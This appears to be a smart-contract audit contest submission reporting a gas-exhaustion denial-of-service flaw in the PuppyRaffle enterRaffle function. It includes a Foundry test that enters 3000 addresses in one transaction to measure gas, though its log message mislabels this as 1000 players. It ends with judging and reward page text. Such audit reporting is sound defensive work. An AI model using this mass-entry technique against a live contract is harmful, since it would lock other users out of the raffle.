Submission Details
Severity:
Gas Gorging Mass Entry DoS Attack on Raffle
Summary
This is a Denial of Service attack targeting the contracts enterRaffle function. The attacker can send a transaction with a big number of entries in one go aiming to exhaust network resources.
Vulnerability Details
The function does not limit the number of raffle entries that can be submitted in a single transaction. The excessive gas consumption can make the enterRaffle function unusable for other users, either by making transactions fail or by making them prohibitively expensive and slow and this would cause DOS.
Impact
Here is a test showing the DOS attack:
function testDosAttack() public {
uint256 playersNum = 3000;
address[] memory players = new address[](playersNum);
for (uint256 i = 0; i < playersNum; i++) {
players[i] = address(i);
}
uint256 gasStart = gasleft();
puppyRaffle.enterRaffle{value: entranceFee * playersNum}(players);
uint256 gasEnd = gasleft();
uint256 gasUsed = (gasStart - gasEnd);
console.log("Gas cost of entering the raffle with 1000 players", gasUsed);
}
Tools Used
Foundry, manual
Recommendations
Limit entry batch size
Updates
Lead Judging Commences
Hamiltonite over 1 year ago
Submission Judgement Published Assigned finding tags:
denial-of-service-in-enter-raffle
Rewards breakdown
nSLOC
143This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.